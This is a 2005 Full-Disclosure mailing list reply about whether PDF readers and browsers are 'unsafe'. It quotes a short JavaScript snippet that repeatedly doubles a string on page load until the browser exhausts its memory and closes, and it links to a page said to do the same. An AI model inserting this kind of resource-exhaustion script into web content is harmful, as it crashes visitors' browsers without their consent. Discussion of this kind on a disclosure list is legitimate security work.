[Full-disclosure] PDF's unsafe?
Bipin Gautam
gautam.bipin at gmail.com
Thu Sep 22 10:52:51 BST 2005
On 9/21/05, Geo. <geoincidents at nls.net> wrote:
> Haven't any of the security firms checked out adobe pdf reader to see if
> it's safe? It took 5 minutes to create this nonsense
> http://www.nthelp.com/test.pdf and that's just using the standard features.
> I hate to think what a real hacker could do with a pdf.
>
> Geo.
>
Even if you have the option in IE "Play videos in webpage"
unchecked... the following page will render....
http://bipin.sosvulnerable.net/temp/fdrd.html
& probably your OS will colse the browser after it runs out of memory.
Or maybe try this:
/* ------------
<body onload="hUNT()">
<script language="JavaScript"><!--
var szhUNT="...cauz its a jungle out there!"
function hUNT()
{szhUNT=szhUNT + szhUNT
window.status="String Length is: "+szhUNT.length
window.setTimeout('hUNT()',1);}
// --></script>
--------------------------- */
SO IE/mozilla is unsafe?
Bipin Gautam
http://bipin.tk
Zeroth law of security: The possibility of poking a system from lower
privilege is zero unless & until there is possibility of direct,
indirect or consequential communication between the two...
Full-Disclosure is hosted and sponsored by Secunia.